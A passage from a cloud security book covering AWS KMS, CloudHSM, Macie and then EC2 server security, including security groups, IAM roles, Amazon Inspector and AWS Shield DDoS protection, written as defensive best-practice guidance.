or let AWS rotate them annually. Let us look at some major benefits of KMS in detail:
Fully managed
AWS KMS is a fully managed service, where AWS takes care of underlying infrastructure to
support high availability as it is deployed in multiple availability zones within a region,
automatic scalability, security, and zero maintenance for the user. This allows the user to
focus on the encryption requirement for their workload. AWS KMS provides
99.999999999% durability for your encrypted keys by storing multiple copies of these keys.
Centralized Key Management
AWS KMS gives you centralized control of all of your encryption keys. You can access KMS
through the AWS Management Console, CLI, and AWS SDK for creating, importing, and
rotating keys. You can also set up usage policies and audit KMS for key usage from any of
these options for accessing AWS KMS.
Integration with AWS services
AWS KMS integrates seamlessly with multiple AWS services to enable encryption of data
stored in these AWS services such as S3, RDS, EMR, and so on. AWS KMS also integrates
with management services, such as AWS CloudTrail, to log usage of each key, every single
time it is used for audit purpose. It also integrates with IAM to provide access control.
Secure and compliant
The AWS KMS is a secure service that ensures your master keys are not shared with anyone
else. It uses hardened systems and hardening techniques to protect your unencrypted
master keys. KMS keys are never transmitted outside of the AWS regions in which they
were created. You can define which users can use keys and have granular permissions for
accessing KMS.
Data Security in AWS
[ 120 ]
The AWS KMS is compliant with many leading regulatory compliance schemes such as
PCI-DSS Level 1, SOC1, SOC2, SOC3, ISO 9001, and so on.
KMS components
Let us look at the important components of AWS KMS and understand how they work
together to secure data in AWS. The envelope encryption is one of the key components of
KMS that we discussed earlier in this chapter.
Customer master key (CMK)
The CMK is a primary component of KMS. These keys could be managed either by the
customer or by AWS. You would usually need CMKs to protect your data keys (keys used
for encrypting data). Each of these keys can be used to protect 4 KB of data directly. These
CMKs are always encrypted when they leave AWS. For every AWS service that integrates
with AWS KMS, AWS provides a CMK that is managed by AWS. This CMK is unique to
your AWS account and region in which it is used.
Data keys
Data keys are used to encrypt data. This data could be in your application outside of AWS.
AWS KMS can be used to generate, encrypt, and decrypt data keys. However, AWS KMS
does not store, manage, or track your data keys. These functions should be performed by
you in your application.
Key policies
A key policy is a document that contains permission for accessing CMK. You can decide
who can use and manage CMK for all CMK that you create, and you can add this
information to the key policy. This key policy can be edited to add, modify, or delete
permissions for a customer managed CMK; however, a key policy for an AWS managed
CMK cannot be edited.
Data Security in AWS
[ 121 ]
Auditing CMK usage
AWS KMS integrates with AWS CloudTrail to provide an audit trail of your key usage. You
can save this trail that is generated as a log file in a S3 bucket. These log files contain
information about all AWS KMS API requests made in the AWS Management Console,
AWS SDKs, command line tools such as AWS CLI and all requests made through other
AWS services that are integrated with AWS KMS. These log files will tell you about KMS
operation, the identity of a requester along with the IP address, time of usage, and so on.
You can monitor, control, and investigate your key usage through AWS CloudTrail.
Key Management Infrastructure (KMI)
AWS KMS provides a secure KMI as a service to you. While encrypting and decrypting
data, it is the responsibility of the KMI provider to keep your keys secure, and AWS KMS
helps you keep your keys secure. The KMS is a managed service so you don't have to worry
about scaling your infrastructure when your encryption requirement is increasing.
AWS CloudHSM
AWS and AWS partners offer various options such as AWS KMS to protect your data in
AWS. However, due to contractual, regulatory compliance, or corporate requirements for
security of an application or sensitive data, you might need additional protection. AWS
CloudHSM is a cloud-based dedicated, single-tenant HSM allowing you to include secure
key storage and high-performance crypto operations to your applications on the AWS
platform. It enables you to securely generate, store, manage, and protect encryption keys in
a way that these keys are accessible only by you or authorized users that only you specify
and no one else.
AWS CloudHSM is a fully managed service that takes care of administrative, time-
consuming tasks such as backups, software updates, hardware provisioning, and high
availability by automating these tasks. However, AWS does not have any access to
configure, create, manage, or use your CloudHSM. You can quickly scale by adding or
removing HSM capacity on-demand with no upfront costs.
An HSM is a hardware device providing secure key storage and cryptographic operations
inside a tamper-proof hardware appliance.
Data Security in AWS
[ 122 ]
AWS CloudHSM runs in your VPC, as shown in the following figure, so it is secure by
design as all VPC security features are available to secure your CloudHSM:
Figure 4 - AWS CloudHSM
CloudHSM features
Let us look at some features of the AWS CloudHSM service:
Generate and use encryption keys using HSMs
AWS CloudHSM provides FIPS 140-2 level 3 compliant HSM for using and generating your
encryption keys. It protects your encryption keys with a single tenant, exclusive access, and
dedicated tamper-proof device in your own AWS VPC.
Pay as you go model
AWS CloudHSM offers a utility pricing model like many other AWS services. You pay only
for what you use and there are no upfront costs whatsoever. You are billed for every
running hour (or partial hour) for every HSM you provision within a CloudHSM cluster.
Data Security in AWS
[ 123 ]
Easy To manage
AWS CloudHSM is a fully managed service, so you need not worry about scalability, high
availability, hardware provisioning, or software patching. These tasks are taken care by of
AWS. The AWS also takes automated encrypted backups of your HSM on a daily basis.
AWS monitors health and network availability of HSMs. It does not have access to keys
stored inside these HSMs. This access is available only to you and users authorized by you.
You are responsible for keys and cryptography operations. This separation of duties and
role-based access control is inherent to CloudHSM design, as shown in the following figure:
Figure 5 - AWS CloudHSM separation of duties
AWS CloudHSM use cases
A CloudHSM cluster can store up to 3,500 keys of any type or size. It integrates with AWS
CloudTrail so all activities related to CloudHSM are logged and you can get a history of all
AWS API calls made to CloudHSM.
With so many features and benefits, AWS CloudHSM has many use cases when it comes to
securing your data. Let us look at some of the most popular use cases for this service:
Offload SSL/TLS processing for web servers
Web servers and web browsers often use SSL or TLS for a secure connection to transfer data
over the internet. This connection requires the web server to use a public-private key pair
along with a public key certificate in order to establish an HTTPS session with each client.
This activity acts as an overhead for the web server in terms of additional computation.
CloudHSM can help you offload this overhead by storing the web server's private key in
HSM as it is designed for this purpose. This process is often known as SSL acceleration.
Data Security in AWS
[ 124 ]
Protect private keys for an issuing certificate authority
A certificate authority is an entity entrusted for issuing digital certificates for a public key
infrastructure. These digital certificates are used by an individual or an organization for
various scenarios by binding public keys to an identity. You need to protect private keys
that are used to sign the certificates used by your certificate authority. CloudHSM can
perform these cryptographic operations and store these private keys issued by your
certificate authority.
Enable transparent data encryption for Oracle
databases
Oracle databases offer a feature called transfer data encryption for encrypting data before
storing it on disk. This feature is available in some versions of Oracle. It uses a two-tier key
structure for securing encryption keys. Data is encrypted using the table key and this table
key is encrypted by using the master key. CloudHSM can be used to store this master
encryption key.
Amazon Macie
Amazon Macie is the newest security service powered by Artificial Intelligence launched by
AWS that uses machine learning to identify, categorize, and secure your sensitive data that
is stored in S3 buckets. It continuously monitors your data and sends alerts when it detects
an anomaly in the usage or access patterns. It uses templated Lambda functions for either
sending alerts, revoking unauthorized access, or resetting password policies upon detecting
suspicious behavior.
As of now, Amazon Macie supports S3 and CloudTrail with the support for more services
such as EC2, DynamoDB, RDS, Glue is planned in the near future. Let us look at two
important features of Amazon Macie.
Data discovery and classification
Amazon Macie allows you to discover and classify sensitive data along with analyzing
usage patterns and user behavior. It continuously monitors newly added data to your
existing data storage.
Data Security in AWS
[ 125 ]
It uses artificial intelligence to understand and analyze usage patterns of existing data in the
AWS environment. It understands data by using the Natural Language Processing (NLP)
method.
It will classify sensitive data and prioritize it according to your unique organizational
data access patterns. You can use it to create your own alerts and policy definitions for
securing your data.
Data security
Amazon Macie allows you to be proactively compliant with security and achieve preventive
security. It enables you to discover, classify, and secure multiple data types such as
personally identifiable information, protected health information, compliance documents,
audit reports, encryption keys, API keys, and so on.
You can audit instantly by verifying compliance with logs that are automated. All the
changes to ACL and security policies can be identified easily. You can configure actionable
alerts to detect changes in user behavior.
You can also configure notifications when your protected data leaves the secured zone. You
can detect events when an unusual amount of sensitive data is shared either internally or
externally.
Summary
Data security is one of the major requirements for most of the AWS users. The AWS
platform provides multiple options to secure data in their data storage services for data at
rest and data in transit. We learned about securing data for most popular storage services
such as AWS S3, AWS RDS, and so on.
We learned the fundamentals of data encryption and how AWS KMS provides a fully
managed solution for creating encryption keys, managing, controlling, and auditing usage
of these encryption keys.
We also learned about AWS CloudHSM, a dedicated hardware appliance to store your
encryption keys for corporate or regulatory compliance. We went through various features
of CloudHSM and the most popular use cases for this service.
Data Security in AWS
[ 126 ]
Lastly, we went through Amazon Macie, a newly launched data security service that uses
machine learning for protecting your critical data by automatically detecting and classifying
it.
The AWS EC2 service provides compute or servers in AWS for purposes such as web
servers, database servers, application servers, monitoring servers, and so on. The EC2 is
offered as IaaS in AWS. In the next chapter, Securing Servers in AWS, we will look at options
to protect your infrastructure in an AWS environment from various internal and external
threats. There are host of AWS services dedicated to secure your servers; we will dive deep
into these services.
5
Securing Servers in AWS
The Amazon Elastic Compute Cloud (EC2) web service provides secure, elastic, scalable
computing capacity in the form of virtual computing environments known as instances in
the AWS cloud. EC2 is the backbone of AWS, in a way, so that it drives a majority of the
revenue for AWS. This service enables users to run their web applications on a cloud by
renting servers. EC2 is part of the Infrastructure as a Service (IaaS) offering from AWS, and
it provides complete control over the instance provided to the user.
These servers or instances are used for a variety of use cases, such as running web
applications, installing various software, running databases, and file storage. EC2 has
various benefits that make it quite popular:
Secured service offering multiple options for securing servers
Elastic web scale computing; no need to guess the computing capacity
Complete control over your EC2 instance
Multiple instance types for various scenarios
Integration with other AWS services
Reliable service, offering 99.95% availability for each region
Inexpensive, offering pay-what-you-use and pay-as-you-use models
Since most of the workloads in AWS run or use EC2 one way or another, it is critical to
secure your servers. AWS provides multiple options to secure your servers from numerous
threats and gives you the ability to test these security measures as well. Securing servers is
essentially securing your infrastructure in AWS. It involves accessing your EC2 instances,
monitoring activities on your EC2 instances, and protecting them from external threats such
as hacking, Distributed Denial of Service (DDoS) attacks, and so on.
Securing Servers in AWS
[ 128 ]
With the Amazon EC2 service, users can launch virtual machines with various
configurations in the AWS cloud. AWS users have full control over these elastic and
scalable virtual machines, also known as EC2 instances.
In this chapter, you are going to learn about best practices and ways to secure EC2 instances
in the cloud. AWS provides security for EC2 instances at multiple levels, such as in the
operating system of the physical host, in the operating system of the virtual machine, and
through multiple firewalls to ensure all API calls are signed. Each of these security
measures is built on the capabilities of other security measures.
Our goal is to secure data stored and transferred from an AWS EC2 instance so that it
reaches its destination without being intercepted by malicious systems while also
maintaining the flexibility of the AWS EC2 instance, along with other AWS services. Our
servers in AWS should always be protected from ever-evolving threats and vulnerabilities.
We will dive deep into the following areas of EC2 security:
IAM roles for EC2
Managing OS-level access to Amazon EC2 instances
Protecting the system from malware
Securing your infrastructure
Intrusion detection and prevention systems
Elastic load balancing security
Building threat protection layers
Test security
In Chapter 3, AWS Virtual Private Cloud, we looked at ways to secure your network in the
AWS cloud. We looked at network access control list (NACL) and security groups as two
firewalls provided by AWS for subnets and EC2 instances, respectively. In this chapter, we
are going to dig deeper into security groups. We will also look at other ways to protect your
infrastructure in the cloud.
We will look into AWS Inspector, an agent-based and API-driven service that automatically
assesses security and vulnerabilities for applications deployed on EC2 instances. We will
cover the following topics for AWS Inspector service:
Features and benefits
Components
Securing Servers in AWS
[ 129 ]
Next, you will learn about AWS Shield, a managed DDoS protection service that will help
you minimize downtime and latency for your applications running on EC2 instances and
for your AWS resources, such as EC2 instances, Elastic Load Balancer (ELB), Route 53, and
so on. We will cover the following topics for the AWS Shield service:
Benefits
Key features
EC2 Security best practices
There are general best practices for securing EC2 instances that are applicable irrespective
of operating system or whether instances are running on virtual machines or on on-premise
data centers. Let's look at these general best practices:
Least access: Unless required, ensure that your EC2 instance has restricted access
to the instance, as well as restricted access to the network. Provide access only to
trusted entities, including software and operating system components that are
required to be installed on these instances.
Least privilege: Always follow the principle of least privilege required by your
instances, as well as users, to perform their functions. Use role-based access for
your instances and create roles with limited permissions. Control and monitor
user access for your instances.
Configuration management: Use AWS configuration management services to
have a baseline for your instance configuration and treat each EC2 instance as a
configuration item. This base configuration should include the updated version
of your anti-virus software, security patches, and so on. Keep assessing the
configuration of your instance against baseline configuration periodically. Make
sure you are generating, storing, and processing logs and audit data.
Change management: Ensure that automated change management processes are
in place in order to detect changes in the server configuration. Create rules using
AWS services to roll back any changes that are not in line with accepted server
configuration or changes that are not authorized.
Audit logs: Ensure that all changes to the server are logged and audited. Use
AWS logging and auditing features, such as AWS CloudTrail and VPC flow logs,
for logging all API requests and AWS VPC network traffic, respectively.
Securing Servers in AWS
[ 130 ]
Network access: AWS provides three options to secure network access for your
EC2 instances, security groups, network access control lists, and route tables. An
Elastic Network Interface (ENI) connected to your instance provides network
connectivity to an AWS VPC.
Configure security group rules to allow minimum traffic for your
instance. For example, if your EC2 instance is a web server, allow
only HTTP and HTTPS traffic.
Use network access control lists as a second layer of defense, as
these are stateless and needs more maintenance. Use them to deny
traffic from unwanted sources.
Configure route tables for the subnet in your VPC to ensure that
instance-specific conditions are met by distinct route tables. For
example, create a route table for internet access and associate it
with all subnets that require access to the internet.
AWS API access from EC2 instances: Quite often, applications running on EC2
instances would need to access multiple AWS services programmatically by
making API calls. AWS recommends that you create roles for these applications,
as roles are managed by AWS and credentials are rotated multiple times in a day.
Moreover, with roles, there is no need to store credentials locally on an EC2
instance.
Data encryption: Any data that is either stored on or transmitted through an EC2
instance should be encrypted. Use Elastic Block Storage (EBS) volumes to
encrypt your data at rest through the AWS Key Management Service (KMS). To
secure data in transit through encryption, use Transport Layer Security (TLS) or
IPsec encryption protocols. Ensure that all connections to your EC2 instances are
encrypted by configuring outbound rules for security groups.
EC2 Security
An EC2 instance comprises many components: the most prominent ones are the Amazon
Machine Image (AMI), the preconfigured software template for your server containing the
operating system and software; the hardware including the processor, memory, storage,
and networking components based on your requirements; persistent or ephemeral storage
volumes for storing your data; the IP addresses, VPCs and virtual and physical location for
your instance, such as its subnet, availability zone, and regions, respectively.
Securing Servers in AWS
[ 131 ]
When an instance is launched, it is secured by creating a key pair and configuring the
security group, a virtual firewall for your instance. In order to access your instance, you will
be required to authenticate using this key pair, as depicted in the following figure:
Figure 1 - AWS EC2 security
EC2 instances interact with various AWS services and cater to multiple scenarios and use
cases across industries, and this universal usability opens up a host of security
vulnerabilities for an EC2 instance. AWS provides options for addressing all such
vulnerabilities. Let's look at all of these options in detail.
IAM roles for EC2 instances
If an application is running on an EC2 instance, it must pass credentials along with its API
request. These credentials can be stored in the EC2 instance and managed by developers.
Developers have to ensure that these credentials are securely passed to every EC2 instance
and are rotated for every instance as well. This is a lot of overhead, which leaves room for
errors and security breaches at multiple points.
Securing Servers in AWS
[ 132 ]
Alternatively, you can use IAM roles for this purpose. IAM roles provide temporary
credentials for accessing AWS resources. IAM roles do not store credentials on instances,
and credentials are managed by AWS, so they are automatically rotated multiple times in a
day. When an EC2 instance is launched, it is assigned an IAM role. This role will have
required permissions to access the desired AWS resource. You can also attach an IAM role
to an instance while it is running.
In the following figure, an IAM role to access an S3 bucket is created for an EC2 instance.
The developer launches an instance with this role. The application running on this instance
uses temporary credentials to access content in the S3 bucket.
In this scenario, the developer is not using long-term credentials that are stored in EC2
instances, thus making this transaction more secure:
Figure 2 - IAM role for EC2 instance
Managing OS-level access to Amazon EC2
instances
Accessing the operating system of an EC2 instance requires different credentials than
applications running on an EC2 instance. AWS lets you use your own credentials for the
operating system; however, AWS helps you to bootstrap for initial access to the operating
system. You can access the operating system of your instance using secure remote system
access protocols such as Windows Remote Desktop Protocol (RDP) or Secure Shell (SSH).
Securing Servers in AWS
[ 133 ]
You can set up the following methods for authenticating operating system access:
X.509 certificate authentication
Local operating system accounts
Microsoft active directory
AWS provides key pairs for enabling authentication to the EC2 instance. These keys can be
generated by AWS or by you; AWS stores the public key, and you store the private key. You
can have multiple key pairs for authenticating access to multiple instances. For enhanced
security, you can also use LDAP or active directory authentication as alternative methods
for authentication, instead of the AWS key pair authentication mechanism.
Protecting your instance from malware
An instance in the AWS cloud should be protected from malware (that is, viruses, trojans,
spams, and so on), just like any server would be protected in your data center. Having an
instance infected with a malware can have far-reaching implications on your entire
infrastructure on the cloud.
When a user runs code on an EC2 instance, this executable code assumes the privileges of
this user and it can carry out any action that can be carried out by this user based on the
user privileges. So, as a rule of thumb, always run code that is trusted and verified with
proper code review procedures on your EC2 instances.
If you are using an AMI to launch an EC2 instance, you must ensure this AMI is safe and
trusted. Similarly, always install and run trusted software; download this software from
trusted and established entities. You could create software depots for all your trusted
software and prevent users from downloading software from random sources on the
internet.
Ensure all your public facing instances and applications are patched with the latest security
configurations and that these patches are revisited regularly and frequently. An infected
instance can be used to send spam, a large number of unsolicited emails. This scenario can
be prevented by avoiding SMTP open relay (insecure relay or third-party relay), which is
usually used to spread spam.
Securing Servers in AWS
[ 134 ]
Always keep your antivirus software, along with your anti-spam software updated from
reputed and trusted sources on your EC2 instance.
In the event of your instance getting infected, use your antivirus software to remove the
virus. Back up all your data and reinstall all the software, including applications, platforms,
and so on, from a trusted source, and restore data from your backup. This approach is
recommended and widely used in the event of an infected EC2 instance.
Secure your infrastructure
AWS lets you create your own virtual private network in the AWS cloud, as you learned in
Chapter 3, AWS Virtual Private Cloud. VPC enables you to secure your infrastructure on the
cloud using multiple options, such as security groups, network access control lists, route
tables, and so on. Along with securing infrastructure, VPC also allows you to establish a
secure connection with your data center outside of the AWS cloud or with your
infrastructure in other AWS accounts. These connections could be through AWS direct
connect or through the internet.
Security groups should be used to control traffic allowed for an instance or group of
instances performing similar functions, such as web servers or database servers. A security
group is a virtual, instance-level firewall. It is assigned to an instance when an instance is
launched. You could assign more than one security group to an instance. Rules of security
groups can be changed anytime, and they are applied immediately to all instances attached
to that security group.
AWS recommends that you use security groups as the first line of defense for an EC2
instance. Security groups are stateful, so responses for an allowed inbound rule will always
be allowed irrespective of the outbound rule, and if an instance sends a request, the
response for that request will be allowed irrespective of inbound rule configuration.
Securing Servers in AWS
[ 135 ]
The following figure shows a security group SL-Web-SG configured for all web servers
inside a VPC. There are three rules configured; HTTP and HTTPS traffic are allowed from
the internet, and SSH for accessing this instance is allowed only from a public IP, that is,
118.185.136.34:
Figure 3 - AWS security groups
Each AWS account has a default security group for the default VPC in every region. If you
do not specify a security group for your instance, this default security group automatically
gets associated with your EC2 instance. This default security group allows all inbound
traffic from instances where the source is this default security group. Alongside, it allows all
outbound traffic from your EC2 instance. You can modify rules for this default security
group, but you cannot delete it.
Security groups are versatile in nature; they allow multiple options for sources for inbound
access and destinations for outbound access. Apart from the IP address or range of IP
addresses, you can also enter another security group as an object reference for source or
destination in order to allow traffic for instances in your security group. However, this
process will not add any rules to the current security group from the source security group.
Securing Servers in AWS
[ 136 ]
The following figure depicts this example, where we have a security group for database
servers; this security group allows traffic only from a web servers security group. In this
configuration, the web servers security group is an object reference for the source field, so
all the instances that are associated with the database security group will always allow
traffic from all instances associated with the web servers security group:
Figure 4 - AWS security groups object reference
Intrusion Detection and Prevention Systems
An Intrusion Detection System (IDS) is a detective and monitoring control that
continuously scans your network, servers, platform, and systems for any security breach or
violation of security policy, such as a configuration change or malicious activity. If it detects
an anomaly, it will report it to the security team.
An Intrusion Prevention System (IPS), on the other hand, is a preventive control. These
controls are placed inside your network, behind organizations' firewalls, and act as a
firewall for all known issues and threats related to incoming traffic. All traffic needs to pass
IPS in order to reach their destination. If an IPS finds traffic to contain malicious content, it
will block that traffic.
The AWS marketplace offers various IDS and IPS products to secure your network and
systems. These products help you detect vulnerabilities in your EC2 instances by deploying
host-based IDS and by employing behavioral monitoring techniques.
Securing Servers in AWS
[ 137 ]
These products also help you secure your AWS EC2 instances from attacks by deploying
next-generation firewalls in your network, which have features such as full stack visibility
for all layers in your infrastructure.
Elastic Load Balancing Security
An Elastic Load Balancer (ELB) is a managed AWS service that automatically distributes
incoming traffic to targets behind a load balancer across all availability zones in a region.
These targets could be EC2 instances, containers, and IP addresses.
An ELB takes care of all encryption and decryption centrally, so there is no additional
workload on EC2 instances. An ELB can be associated with AWS VPC and has its own
security groups. These security groups can be configured in a similar way to EC2 security
groups with inbound and outbound rules.
Alongside, ELB also supports end-to-end traffic encryption through the Transport Layer
Security (TLS) protocol for networks using HTTPS connections. In this scenario, you don't
need to use an individual instance for terminating client connections while using TLS;
instead, you can use ELB to perform the same function. You can create an HTTPS listener
for your ELB that will encrypt traffic between your load balancer and clients initiating
HTTPS sessions. It will also encrypt traffic between EC2 instances and load balancers
serving traffic to these EC2 instances.
Building Threat Protection Layers
Quite often, organizations will have multiple features for securing their infrastructure,
network, data, and so on. The AWS cloud gives you various such features in the form of
VPC, security groups as virtual firewall for your EC2 instances, NACL as secondary
firewalls for your subnets, and host-based firewalls and IDS, along with Intrusion
Prevention System (IPS), for creating your own threat protection layer as part of your
security framework.
This threat protection layer will prevent any unwanted traffic from reaching its desired
destination, such as an application server or a database server. For example, in the
following figure, a corporate user is accessing an application from the corporate data center.
This user is connecting to AWS VPC using a secure connection, which could be a VPN
connection or a direct connect connection and does not require interception by a threat
protection layer.
Securing Servers in AWS
[ 138 ]
However, requests made by all users accessing this application through the internet are
required to go through a threat protection layer before they reach the presentation layer.
This approach is known as layered network defense on the cloud. This approach is suitable
for organizations that need more than what AWS offers out of the box for protecting
networking infrastructure. AWS VPC provides you with various features to support the
building of your threat protection layer; these features include the following:
Support for multiple layers of load balancers
Support for multiple IP addresses
Support for multiple Elastic Network Interfaces (ENI)
Figure 5 - AWS layered network defense
Securing Servers in AWS
[ 139 ]
Testing security
It is imperative for any Infrastructure Security Management System (ISMS) to
continuously test their security measures and validate them against ever-evolving threats
and vulnerabilities. Testing these security measures and controls involves testing the
infrastructure and network provided by AWS. AWS recommends that you take the
following approaches to test the security of your environment:
External vulnerability assessment: Engage a third party that has no knowledge
of your infrastructure and controls deployed. Let this third party test all your
controls and systems independently. Use the findings of this engagement to
strengthen your security framework.
External penetration tests: Utilize the services of a third party that has no
knowledge of your infrastructure and controls deployed to break into your
network and servers in a controlled manner. Use these findings to strengthen
your security controls deployed for intrusion prevention.
Internal gray or white-box review of applications and platforms: Use an
internal resource, a tester, who has knowledge of your security controls to try to
break into the security of applications and platforms and expose or discover
vulnerabilities.
Penetration testing process: AWS allows you to conduct penetration testing for
your own instances; however, you have to request permission from AWS before
you conduct any penetration testing. You would have to log in using root
credentials for the instance that you want to test and fill an AWS
Vulnerability/Penetration Testing Request Form. If you want a third party to
conduct these tests, you can fill the details about it in this form as well.
As of now, the AWS penetration testing policy allows testing of the following AWS services:
Amazon Elastic Compute Cloud
Amazon Relational Database Service
Amazon Aurora
Amazon CloudFront
Amazon API Gateway
AWS Lambda
AWS Lightsail
DNS Zone Walking
Securing Servers in AWS
[ 140 ]
Amazon Inspector
Amazon Inspector is an automated, agent-based security and vulnerability assessment
service for your AWS resources. As of now, it supports only EC2 instances. It essentially
complements devops culture in an organization, and it integrates with continuous
integration and continuous deployment tools.
To begin with, you install an agent in your EC2 instance, prepare an assessment template,
and run a security assessment for this EC2 instance.
Amazon Inspector will collect data related to running processes, the network, the filesystem
and lot of data related to configuration, the traffic flow between AWS services and network,
the secure channels, and so on.
Once this data is collected, it is validated against a set of predefined rules known as the
rules package, that you choose in your assessment template, and you are provided with
detailed findings and issues related to security, categorized by severity.
The following figure shows the Amazon Inspector splash screen with three steps for getting
started with Amazon Inspector:
Figure 6 - Amazon Inspector splash screen
Securing Servers in AWS
[ 141 ]
Amazon Inspector features and benefits
Amazon Inspector goes hand in hand with the continuous integration and continuous
deployment activities that are essential part of the DevOps life cycle. It helps you integrate
security with your DevOps by making security assessment part of your deployment cycle.
Amazon Inspector has several important features that make it one of the most preferred
security assessment services for any infrastructure in AWS. Let's look at these features:
Enforce security standards and compliance: You can select a security best
practices rules package to enforce the most common security standards for your
infrastructure. Ensure that assessments are run before any deployment to
proactively detect and address security issues before they reach the production
environment. You can ensure that security compliance standards are met at every
stage of your development life cycle. Moreover, Amazon Inspector provides
findings based on real activity and the actual configuration of your AWS
resources, so you can rest assured about the compliance of your environment.
Increasing development agility: Amazon Inspector is fully automatable through
API. Once you integrate it with your development and deployment process, your
security issues and your vulnerabilities are detected and resolved early, resulting
in saving a huge amount of resources. These resources can be used to develop
new features for your application and release it to your end users, thus increasing
the velocity of your development.
Leverage AWS Security expertise: Amazon Inspector is a managed service, so
when you select a rules package for assessment, you get assessed for the most
updated security issues and vulnerabilities for your EC2 instance. Moreover,
these rules packages are constantly updated with ever evolving threats,
vulnerabilities, and best practices by the AWS Security organization.
Integrated with AWS services and AWS partners: Amazon Inspector integrates
with AWS partners, providing security tools through its public-facing APIs. AWS
partners use Amazon Inspector's findings to create email alerts, security status
dashboards, pager platforms, and so on. Amazon Inspector works with a
network address translation (NAT) instance, as well as proxy environments. It
also integrates with the AWS Simple Notification Service (SMS) for notifications
and AWS CloudTrail for recording all API activity.
Securing Servers in AWS
[ 142 ]
The following figure shows the Amazon Inspector integration with AWS CloudTrail. All
activities related to Amazon Inspector are captured by AWS CloudTrail events:
Figure 7 - Amazon Inspector CloudTrail events
Amazon Inspector publishes real-time metrics data to AWS CloudWatch so you can analyze
metrics for your target (EC2 instance) as well as for your assessment template in AWS
CloudWatch. By default, Amazon Inspector sends data to AWS CloudWatch in interval of
five minutes. It could be changed to a one minute interval as well.
There are three categories of metrics available in AWS CloudWatch for Amazon Inspector,
as follows:
Assessment target
Assessment template
Aggregate
Securing Servers in AWS
[ 143 ]
The following figure shows metrics available for assessment targets in AWS CloudWatch:
Figure 8 - Amazon Inspector CloudWatch metrics
Amazon Inspector components
Amazon Inspector is accessible the through AWS Management Console, the AWS Software
Development Kit (SDK), AWS Command Line Tools, and Amazon Inspector APIs,
through HTTPS. Let's look at the major components of this service, as shown in the
following figure:
Figure 9 - Amazon Inspector dashboard
Securing Servers in AWS
[ 144 ]
AWS agent: This is a software agent developed by AWS that must be installed in
your assessment target, that is, your EC2 instance. This agent monitors all
activities and collects data for your EC2 instance, such as the installation,
configuration, and filesystem, as per the rules package selected by you for
assessment. It periodically sends this data to the Amazon Inspector service. AWS
Agent simply collects data; it does not change anything in the EC2 instance it is
running.
Assessment run: You will periodically run assessments on your EC2 instance
based on the rules package selected. Once your AWS agent performs assessment,
it discovers any security vulnerabilities in your EC2 instance. Once you have
completed the assessment, you will get findings, with a list of potential issues
and their severity.
Assessment target: Amazon Inspect or requires you to select an assessment
target; this is your EC2 instance or a group of EC2 instances that will be assessed
for any potential security issues. These instances should be tagged with key value
pairs. You can create up to 50 assessment targets per AWS account.
Finding: A finding is a potential security issue reported by Amazon Inspector
service after running an assessment for your target EC2 instance. These findings
are displayed in the Amazon Inspector web console or can be accessed through
API. These findings contain details about the issue, along with its severity and
recommendations to fix it.
Assessment report: This is a document that details what all was tested for an
assessment, along with the results of those tests. You can generate assessment
reports for all assessments once they are completed successfully. There are two
types of assessment reports:
The findings report
The full report
Rules package: Amazon Inspector has a repository of hundreds of rules, divided
under four rules packages. These rules packages are the knowledge base of the
most common security and vulnerability definitions. Your assessment target is
checked against the rules of a rules package. These rules packages are constantly
updated by the Amazon security team, as and when new threats, security issues,
and vulnerabilities are identified or discovered. These four rules packages are
shown in the following figure:
Securing Servers in AWS
[ 145 ]
Figure 10 - Amazon Inspector rules packages
Rules: Amazon Inspector has predefined rules in the rules packages; as of now,
custom rules cannot be defined for a rules package. A rule is a check performed
by an Amazon Inspector agent on an assessment target during an assessment. If a
rule finds a security issue, it will add this issue to findings. Every rule has a
security level assigned to it. There are four security levels for a rule, as follows:
High
Medium
Low
Informational
A high, medium, or low security level indicates an issue that might
cause an interruption in the ways in which your services are required to
run. An informational security level describes the security configuration
for your instance.
Securing Servers in AWS
[ 146 ]
Assessment template: This is your configuration for running an assessment. You
will choose your targets, along with one of the four predefined rules packages
that you want to run; you will also choose a duration, from 15 minutes to 24
hours, and other information, as shown in the following figure:
Figure 11 - Amazon Inspector assessment template
AWS Shield
AWS Shield is a managed Distributed Denial of Service (DDoS) protection service. It
detects and automatically mitigates attacks that could potentially result in downtime for
your application and might also increase latency for your applications running on EC2
instances.
Securing Servers in AWS
[ 147 ]
A DDoS attack results in increased traffic for your EC2 instances, Elastic Load Balancer,
Route 53, or CloudFront. As a result, these services would need to scale up resources to
cope with the increased traffic. A DDoS attack usually happens when multiple systems are
compromised or infected with a Trojan flooding a target system with an intention to deny a
service to intended users by generating traffic and shutting down a resource so it cannot
serve more requests.
AWS Shield has two tiers: Standard and Advanced. All protection under the AWS Shield
Standard option is available to all AWS customers by default, without any additional
charge. The AWS Shield Advanced option is available to customers with business and
enterprise support at an additional charge. The advanced option provides protection
against more sophisticated attacks on your AWS resources, such as an EC2 instance, ELB,
and so on. The following figure shows AWS Shield tiers:
Figure 12 - AWS shield tiers
Securing Servers in AWS
[ 148 ]
AWS Shield benefits
AWS Shield is covered under the AWS suite of services that are eligible for Health
Insurance Portability and Accounting Act (HIPAA) compliance. It can be used to protect
websites hosted outside of AWS, as it is integrated with AWS CloudFront. Let's look at
other benefits of AWS Shield:
Seamless integration and deployment: AWS Shield Standard automatically
secures your AWS resources with the most common and regular DDoS attacks in
network and transport layers. If you require enhanced security for more
sophisticated attacks, you can opt for the AWS Shield Advanced option for your
AWS resources, such as EC2 Instances, Route 53 AWS CloudFront, and so on, by
enabling the AWS Shield Advanced option from the AWS Management Console
or through APIs.
Customizable protection: You can script your own customized rules to address
sophisticated attacks on your AWS resources using the AWS Shield Advanced
tier. You can deploy these rules immediately to avoid any imminent threat, such
as by blocking bad traffic or for automating response to security incidents. You
could also take the help of the AWS DDoS Response Team (DRT) to write the
rules for you. This team is available for your support 24/7.
Cost efficient: AWS provides free protection against network layer attacks for all
its customers through AWS Shield Standard. With AWS Shield Advanced, you
get protection against DDoS Cost Escalation, which prevents your cost going up
in case of DDoS attacks. However, if you are billed for any of your AWS resource
usage due to a DDoS attack, you can request credits from AWS through the AWS
support channel.
The AWS Shield Advanced billing plan starts at USD $3000 per month. Charges for data
transfer are calculated separately for all AWS resources selected for the AWS Shield
advanced protection.
AWS Shield features
Let's look at AWS Shield features for Standard and Advanced tiers.
Securing Servers in AWS
[ 149 ]
AWS Shield Standard
Quick detection: AWS Shield Standard automatically inspects all traffic for your
AWS resources through its continuous network flow monitoring feature. It
detects any malicious traffic through a combination of advanced algorithms,
specific analysis, traffic signatures, and so on in real time, to prevent you from the
most common and frequent attacks.
Inline attack mitigation: AWS Shield Standard gives you protection against
